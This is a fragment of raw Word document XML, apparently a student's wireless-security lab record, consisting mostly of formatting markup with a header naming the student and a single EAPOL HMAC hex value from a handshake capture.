    <w:p w14:paraId="5E2AFE1D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38437" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="6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EAPOL HMAC 0A 12 4C 3D ED BD EE C0 2B C9 5A E3 C1 65 A8 5C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED40394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69A1731" w14:textId="77777777"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0785EC9" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E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38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3191DDBA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8CD72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9F24CB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4125E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FB8EA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869AA6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D263FA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AAEF09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77EB43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1201E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972279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DE2797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F4EDAC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F8659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2319E4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39684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CDF19E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D2001B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A5D97F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1D032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BF9F47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F3857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63FCE1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C7813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83B781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946E32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5E0CBE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91ABA5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D84FE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9A3CB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4069CF" w14:textId="77777777"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B17662" w14:textId="77777777" w:rsidR="00F856A8" w:rsidRDefault="00F856A8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68D72" w14:textId="77777777" w:rsidR="00F856A8" w:rsidRDefault="00F856A8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91066" w14:textId="725D17C4" w:rsidR="0011262E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  <w:sectPr w:rsidR="0011262E" w:rsidSect="008B42C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</w:t>
      </w:r>
      <w:r w:rsidR="00B47B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55912BFD" w14:textId="1603ED7C" w:rsidR="0011262E" w:rsidRDefault="0011262E"/>
    <w:sectPr w:rsidR="0011262E" w:rsidSect="008B42C2">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1060" w:right="900" w:bottom="1340" w:left="940" w:header="0" w:footer="112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54F2C" w14:textId="77777777" w:rsidR="00AC3275" w:rsidRDefault="00AC3275" w:rsidP="00B47B90">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="036100B5" w14:textId="77777777" w:rsidR="00AC3275" w:rsidRDefault="00AC3275" w:rsidP="00B47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EDBFD" w14:textId="77777777" w:rsidR="009B0863" w:rsidRDefault="009B08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24591" w14:textId="77777777" w:rsidR="009B0863" w:rsidRDefault="009B08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8DBEB" w14:textId="77777777" w:rsidR="009B0863" w:rsidRDefault="009B0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E416F" w14:textId="77777777" w:rsidR="00AC3275" w:rsidRDefault="00AC3275" w:rsidP="00B47B90">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3C9C0571" w14:textId="77777777" w:rsidR="00AC3275" w:rsidRDefault="00AC3275" w:rsidP="00B47B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F0823" w14:textId="77777777" w:rsidR="009B0863" w:rsidRDefault="009B08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915B3" w14:textId="77777777" w:rsidR="009B0863" w:rsidRDefault="009B0863" w:rsidP="009B0863">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="2868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Reg no: 210701083      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  <w:t xml:space="preserve"> Name: Hemanth Kumar D</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="352C98AF" w14:textId="0332371D" w:rsidR="00B47B90" w:rsidRPr="009B0863" w:rsidRDefault="00B47B90" w:rsidP="009B08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0EF0A" w14:textId="77777777" w:rsidR="009B0863" w:rsidRDefault="009B08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E3336"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA548A62"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="423" w:hanging="284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601" w:hanging="30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400" w:hanging="300"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2560" w:hanging="300"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3631" w:hanging="300"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4702" w:hanging="300"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5773" w:hanging="300"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6845" w:hanging="300"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7916" w:hanging="300"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="93802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62E"/>
    <w:rsid w:val="0011262E"/>
    <w:rsid w:val="00464398"/>
    <w:rsid w:val="008B42C2"/>
    <w:rsid w:val="008F6DE1"/>
    <w:rsid w:val="009B0863"/>
    <w:rsid w:val="00A764B7"/>
    <w:rsid w:val="00AC3275"/>
    <w:rsid w:val="00B47B90"/>
    <w:rsid w:val="00C0404F"/>
    <w:rsid w:val="00CF72EE"/>
    <w:rsid w:val="00F856A8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EA617"/>
  <w15:docId w15:val="{97B263A5-6324-4370-8DFC-B5A62D62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7B9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B90"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B47B9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Hemanth Kumar D</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-17T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T18:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>